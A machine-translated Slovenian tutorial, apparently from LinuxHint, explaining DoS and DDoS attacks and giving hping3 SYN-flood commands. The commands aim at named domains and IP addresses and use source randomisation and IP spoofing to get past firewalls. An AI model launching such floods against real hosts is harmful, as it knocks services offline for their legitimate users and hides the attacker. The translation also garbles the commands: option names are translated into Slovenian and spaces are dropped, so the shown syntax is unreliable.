hping3 poplava ddos

Hping3 Flood Ddos



Ta vadnica se osredotoča na napade DDOS (Distributed Denial of Service) z orodjem hping3. Če ste že seznanjeni z napadi DOS (zavrnitev storitve) in DDOS, lahko nadaljujete branje iz praktičnih navodil hping3, sicer je priporočljivo izvedeti, kako ti napadi delujejo.

DOS napadi


Napad z zavrnitvijo storitve (DOS) je zelo preprosta tehnika zavračanja dostopnosti do storitev (zato se imenuje napad z zavrnitvijo storitve). Ta napad je sestavljen iz preobremenitve cilja z velikimi paketi ali njihovo veliko količino.







Čeprav je ta napad zelo enostaven za izvedbo, ne ogroža informacij ali zasebnosti tarče, ni prodornega napada in ima za cilj le preprečiti dostop do cilja.
S pošiljanjem količine paketov cilj ne more obvladati napadalcev, kar strežniku prepreči, da bi služil zakonitim uporabnikom.



Napadi DOS se izvajajo iz ene same naprave, zato jih je enostavno ustaviti z blokiranjem napadalčevega IP -ja, vendar lahko napadalec spremeni in celo prevara (klonira) ciljni naslov IP, vendar se požarni zidovi s temi napadi ne spopadajo. v nasprotju s tem, kar se zgodi z napadi DDOS.



DDOS napadi

Napad distribuirane zavrnitve storitve (DDOS) je podoben napadu DOS, vendar se izvaja hkrati iz različnih vozlišč (ali različnih napadalcev). Navade DDOS običajno izvajajo botneti. Botneti so avtomatizirani skripti ali programi, ki okužijo računalnike za izvajanje avtomatizirane naloge (v tem primeru DDOS napad). Heker lahko ustvari botnet in okuži številne računalnike, iz katerih bodo botneti sprožili napade DOS, dejstvo, da številni botneti streljajo hkrati, napad DOS spremeni v napad DDOS (zato se imenuje distribuirani).





Seveda obstajajo izjeme, pri katerih so napade DDOS izvajali pravi človeški napadalci, na primer skupina hekerjev Anonymous, ki jo je združilo na tisoče ljudi po vsem svetu, je zaradi njene enostavne izvedbe to tehniko uporabljala zelo pogosto (potrebovali so samo prostovoljce, ki so delili njihov vzrok), tako je na primer Anonymous med invazijo pustil popolnoma izključeno Gadafijevo libijsko vlado, libijska država pa je ostala brez obrambe pred tisoči napadalcev po vsem svetu.

Tovrstne napade, ki se izvajajo iz različnih vozlišč, je izredno težko preprečiti in ustaviti ter običajno zahtevajo posebno strojno opremo, to je zato, ker požarni zidovi in ​​obrambne aplikacije niso pripravljeni na soočanje z več tisoč napadalci hkrati. To ne velja za hping3, večina napadov, izvedenih s tem orodjem, bo blokirana z obrambnimi napravami ali programsko opremo, vendar je uporabna v lokalnih omrežjih ali proti slabo zaščitenim ciljem.



O hping3

Orodje hping3 vam omogoča pošiljanje manipuliranih paketov. To orodje vam omogoča nadzor nad velikostjo, količino in razdrobljenostjo paketov, da preobremenite cilj in zaobidete ali napadate požarne zidove. Hping3 je lahko uporaben za namene testiranja varnosti ali zmogljivosti, z njim lahko preizkusite učinkovitost požarnih zidov in če strežnik zmore veliko količino paketov. Spodaj boste našli navodila, kako uporabljati hping3 za namene varnostnega testiranja.

Kako začeti z napadi DDOS z uporabo hping3:

Na distribucijah Debian in Linux, ki temeljijo na njih, lahko namestite hping3 tako, da zaženete:

#aptnamestitehping3-in

Preprost napad DOS (ne DDOS) bi bil:

#sudohping3-S -poplava -V -str 80170.155.9.185

Kje:
sudo: daje potrebne privilegije za zagon hping3.
hping3:
kliče program hping3.
-S: podaja pakete SYN.
- poplava: streljajte po lastni presoji, odgovori bodo prezrti (zato odgovori ne bodo prikazani) in paketi bodo poslani čim hitreje.
-V: Besedost.
-p 80: vrata 80, to številko lahko zamenjate za storitev, ki jo želite napasti.
170.155.9.185: ciljni IP.

Poplava z uporabo paketov SYN proti vhodu 80:

Naslednji primer prikazuje napad SYN proti lacampora.org:

#sudohping3 lacampora.org-q -n -d 120 -S -str 80 -poplava --rand-source

Kje:
Lacampora.org: je tarča
-q: kratek izhod
-n: namesto gostitelja prikaži ciljni IP.
-d 120: nastavite velikost paketa
-vir in vir: skriti IP naslov.

Naslednji primer prikazuje drug možen primer poplave:

SYN poplava proti pristanišču 80:

#sudohping3--rand-sourceivan.com-S -q -str 80 -poplava

S hping3 lahko svoje cilje napadete tudi s ponarejenim IP -jem. Če želite zaobiti požarni zid, lahko celo sami klonirate svoj ciljni IP ali kateri koli dovoljeni naslov, ki ga poznate (to lahko dosežete na primer z Nmapom ali sniferjem, da poslušate vzpostavljene povezave).

Sintaksa bi bila naslednja:

#sudohping3-za <LAŽNI IP> <tarča> -S -q -str 80 -hitreje -c2

V tem praktičnem primeru bi se napad zdel:

#sudohping3-za190.0.175.100 190.0.175.100-S -q -str 80 -hitreje -c2

Upam, da vam je bila ta vadnica o hping3 koristna. Sledite LinuxHintu za več nasvetov in posodobitev o Linuxu in omrežju.